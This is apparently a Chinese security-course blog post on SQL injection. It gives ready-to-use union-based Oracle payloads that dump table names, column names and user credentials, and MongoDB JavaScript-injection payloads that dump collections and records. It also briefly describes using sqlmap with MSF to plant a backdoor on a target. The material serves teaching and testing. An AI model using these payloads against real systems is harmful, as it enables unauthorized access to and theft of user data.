26、web攻防——通用漏洞&SQL注入&Sqlmap&Oracle&Mongodb&DB2

文章目录

SQL注入课程体系;

  1. 数据库注入:access、mysql、mssql、oracle、mongodb、postgresql等
  2. 数据类型注入:数字型、字符型、搜索型、加密型(base63 json)等
  3. 提交方式注入:get、post、cookie、http头等
  4. 查询方式注入:查询、增加、删除、更新、堆叠等
  5. 复杂注入利用:二次注入、dnslog注入、绕过bypass等

Oracle

参考资料:【实战】Oracle注入总结

# 判断字段数
order by 3

# 测回显
and 1=2 union select '1','2' from dual //要加单引号

在这里插入图片描述

# 查看数据库名(每次只能查一条数据)
and 1=2 union select '1',(select table_name from user_tables where rownum=1) from dual
and 1=2 union select '1',(select table_name from user_tables where rownum=1 and table_name not in ('LOGMNR_SEESION_EVOLVE$')) from dual

在这里插入图片描述
在这里插入图片描述

# 模糊爆库
and 1=2 union select '1',(select table_name from user_tables where rownum=1 and table_name like '%user%') from dual //%..%之间的内容为你想要的库名可能包含得关键词

在这里插入图片描述

# 爆列名
and 1=2 union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users') from dual

在这里插入图片描述

# 爆其他列名
and 1=2 union select '1',(select column_name from all_tab_columns where rownum=1 and table_name='sns_users' and column_name not in ('USER_NAME')) from dual

在这里插入图片描述

# 爆数据
and 1=2 union select user_name,user_pwd from "sns_users"

在这里插入图片描述

# 爆其他数据
and 1=2 union select user_name,user_pwd from "sns_users" where USER_NAME<>'hu'

在这里插入图片描述

MongoDB

在python环境中,一般用MongoDB。

# 测回显
/new_list.php?id=1'});return ({title:1,content:'2
# 爆库名
/new_list.php?id=1'});return ({title:tojson(db),content:'2

在这里插入图片描述

# 爆表名
/new_list.php?id=1'});return ({title:tojson(db.getCollectionNames()),content:'2 //db.getCollectionNames()()返回得是数组,需要用tojson转换为字符串

在这里插入图片描述

# 爆字段内容
/new_list.php?id=1'});return ({title:tojson(db.Authority_confidentail.find()[0]),content:'2 // db.Authority_confidentail是当前用的集合(表),find函数用于查询,0是第一条数据。

在这里插入图片描述

sqlmap

sqlmap超详细笔记

  • sqlmap 数据库注入数据猜解
  • sqlmap 高权限注入读写执行
  • sqlmap 高权限注入联动MSF,其实就是用sqlmap上传一个后门,MSF监听端口,Sqlmap执行后门文件,靶机上线。

sqlmap支持哪些数据库注入?
在这里插入图片描述

不支持nosql

sqlmap支持哪些sql注入模型?
在这里插入图片描述

带外指的是类型dnslog这类得注入。

sqlmap支持其他不一样功能?
  sqlmap提供了很多脚本。
使用sqlmap一般注入流程分析?

  1. 判断注入点;
  2. 判断数据库类型,就是这个注入点是什么数据库的注入点;
  3. 根据数据库类型,是否存在高权限注入点;
  4. 文件读写、命令执行不行,就只能老老实实去猜数据;

  如果碰到一些网站,登陆后的注入点;电脑能访问,手机不能访问。建议使用sqlmap -r参数使用数据包进行跑。

  • 16
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值